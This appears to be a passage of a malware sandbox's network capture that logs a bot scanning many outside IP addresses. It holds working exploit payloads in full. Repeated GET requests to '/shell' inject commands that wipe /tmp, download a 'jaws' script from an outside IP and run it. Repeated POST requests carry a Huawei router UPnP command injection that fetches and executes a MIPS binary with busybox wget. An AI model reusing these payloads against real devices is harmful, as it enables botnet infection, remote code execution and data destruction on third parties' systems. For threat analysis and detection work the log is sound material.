22 5f 74 6f 70 22 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 6f 6e 5f 73 75 62 6d 69 74 28 29 20 7b 0a 09 76 61 72 20 75 73 65 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 6e 61 6d 65 22 29 3b 0a 09 76 61 72 20 70 61 73 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 73 73 77 6f 72 64 22 29 3b 0a 09 76 61 72 20 74 66 30 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 73 5b 30 5d 3b 0a 0a 09 69 66 20 28 75 73 65 72 2e 76 61 6c 75 65 20 3d 3d 20 27 27 29 20 7b 0a 09 09 61 6c 65 72 74 28 27 49 6e 61 76 6c 69 64 20 75 73 65 72 6e 61 6d 65 27 29 3b 0a 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 7d 0a 09 69 66 20 28 75 73 65 72 2e 76 61 6c 75 65 20 21 3d 20 22 61 64 6d 69 6e 22 20 26 26 0a 09 09 75 73 65 72 2e 76 61 6c 75 65 20 21 3d 20 22 73 75 70 70 6f
                                                            Data Ascii: <!DOCTYPE html><html><head><meta http-equiv='pragma' content='no-cache'><style type="text/css">span.title {font-size:1.2em;}table.pos {margin:0;width:100%;}table.real {margin-top:20px;margin-left:auto;margin-right:auto;width:380px;height:144px;border:2px solid #666;}td.td_header {text-align:right;width:80px;}td.td_input {text-align:left;}td.button {text-align:right;}td#pos_td {text-align:center;padding-top:40px;}input#username, input#password { width:90%; }</style><script>if (top.location.href != self.location.href) {top.location.href = self.location.href;window.open(self.location.href, "_top");}var url = location.href;var i = url.lastIndexOf("/");if (!(i == -1 ||url.substr(i) == "" ||url.substr(i + 1) == "" ||url.substr(i + 1) == "index.html"))window.open("/", "_top");function on_submit() {var user = document.getElementById("username");var pass = document.getElementById("password");var tf0 = document.forms[0];if (user.value == '') {alert('Inavlid username');return false;}if (user.value != "admin" &&user.value != "suppo
                                                            Jan 26, 2024 15:32:18.558970928 CET1058INData Raw: 72 74 22 20 26 26 0a 09 09 75 73 65 72 2e 76 61 6c 75 65 20 21 3d 20 22 75 73 65 72 22 29 20 7b 0a 09 09 61 6c 65 72 74 28 27 49 6e 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 2e 27 29 3b 0a 09
                                                            Data Ascii: rt" &&user.value != "user") {alert('Invalid username, please try again.');return false;}tf0.submit();return true;}function init() {document.getElementById("username").focus();document.getElementById("username").select();


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            382192.168.2.234968866.39.97.3780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.363065958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.484880924 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:18 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            383192.168.2.2342590186.39.102.20880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.363394976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.603717089 CET424INData Raw: 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 63 72 6f 5f 68 74 74 70 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32
                                                            Data Ascii: 93.123.85.149/jaws;sh+/tmp/jaws 400 Bad RequestServer: micro_httpdDate: Fri, 26 Jan 2024 14:32:16 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=1000Content-Type: text/htmlContent-Security-Policy: default-src 'self'; frame-an


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            384192.168.2.233960851.89.136.11580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.378721952 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            385192.168.2.235469658.27.229.5980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.457146883 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            386192.168.2.234146023.213.247.10180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.461409092 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.613364935 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:18 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:18 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 35 66 37 64 35 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 33 38 26 23 34 36 3b 31 61 36 61 37 37 65 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;65f7d517&#46;1706279538&#46;1a6a77ea</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            387192.168.2.2355066156.224.143.2380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.476217985 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            388192.168.2.2338874112.192.19.16380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.529901028 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:20.608597994 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:23.264169931 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:28.383415937 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:38.366142035 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:58.587203026 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            389192.168.2.2343802209.206.59.8780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.540220022 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            390192.168.2.2333278104.16.140.12680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.575263977 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            391192.168.2.233473220.25.49.6080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.576205969 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            392192.168.2.2352124188.128.228.2980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.599330902 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.835520983 CET285INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 128
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Oops! 400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            393192.168.2.2340828156.241.109.11937215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.664967060 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:20.384573936 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:22.432271957 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:26.591701984 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:34.782589912 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
